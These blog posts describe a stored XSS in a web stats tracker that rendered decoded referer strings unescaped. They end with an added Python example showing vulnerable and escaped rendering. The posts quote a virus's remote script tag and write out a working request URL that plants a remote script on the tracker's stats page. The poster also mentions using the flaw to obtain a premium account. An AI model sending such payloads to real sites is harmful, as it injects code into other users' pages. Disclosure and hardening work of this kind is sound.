I use this one to track visitors coming to my blog.<br>Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query:<br><pre>&lt;script src=http://121.15.220.104/1.js&gt;&lt;/script&gt;</pre><br>which is the signature for the virus.<br><br>Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad:<br><a href="http://www.flickr.com/photos/22823442@N02/2195246062/">http://www.flickr.com/photos/22823442@N02/2195246062/</a><br>What happened? No, neither my comp nor any other computer around was pwned by the virus. It was the tracker site that got pwned. For some weird reason it HTML-decoded the referer string, and as a result the malicious script was inserted into the page.<br><br>Now let's see if I can "forge" the referer to insert my own script into the page :)
I finally managed to reproduce the XSS in a "nice" way :)<br>First you need to request the page:<br><a href="http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search">http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search</a><br>Then wait for a few minutes and you'll see the XSS here: <a href="http://extremetracking.com/open;ref1?login=qpenguin">http://extremetracking.com/open;ref1?login=qpenguin</a><br>Screenshot:<br><a href="http://www.flickr.com/photos/22823442@N02/2194552167/">http://www.flickr.com/photos/22823442@N02/2194552167/</a><br><br>Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one :)
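The bug the thread describes is a stored XSS in a referer-display feature: the tracker decodes the incoming referer string and writes it into its HTML page without escaping. The following is an added example, written for this thread and not code from the tracker or from the poster, that puts the flawed rendering step beside a hardened one. The sample referer is constructed here, modelled on the Google search URL shape in the thread, and the script URL inside it is a placeholder (`example.invalid`), not the one quoted above.

```python
import html
from urllib.parse import unquote_plus, urlsplit

# Constructed sample referer: a Google search URL whose query carries a
# URL-encoded <script> tag, the shape the thread describes. The script
# host is a placeholder, not the address quoted in the post.
SAMPLE_REFERER = (
    "http://www.google.com/search?hl=en&q="
    "%3Cscript+src%3Dhttp%3A//example.invalid/x.js%3E%3C/script%3E"
    "&btnG=Google+Search"
)


def render_vulnerable(referer: str) -> str:
    """Reproduces the flaw: decode the referer for display (the post calls
    this HTML-decoding; the bytes in question are URL-encoded) and drop the
    result straight into the page, in both attribute and text context."""
    decoded = unquote_plus(referer)
    return f'<td class="ref"><a href="{decoded}">{decoded}</a></td>'


def render_safe(referer: str) -> str:
    """Hardened form: decode for readability if you like, but HTML-escape
    before the string touches the page, and only emit an href when the
    scheme is http(s) so a javascript: referer cannot become a live link."""
    decoded = unquote_plus(referer)
    text = html.escape(decoded, quote=True)
    scheme = urlsplit(decoded).scheme.lower()
    if scheme in ("http", "https"):
        return f'<td class="ref"><a href="{text}">{text}</a></td>'
    return f'<td class="ref">{text}</td>'


def contains_active_markup(fragment: str) -> bool:
    """Cheap check to run over rendered output in a test or code review:
    does a raw <script tag survive into the page? Escaped output only
    contains '&lt;script', which this does not match."""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_vulnerable), ("safe", render_safe)):
        out = fn(SAMPLE_REFERER)
        print(f"{name}: active markup = {contains_active_markup(out)}")
        print("   ", out)
```

The decoding step is what makes this a stored rather than reflected issue: the tracker logs the referer once and re-renders it to every later visitor of the stats page, so the escape has to happen at output time, for whoever reads the log, not just on the request that recorded it.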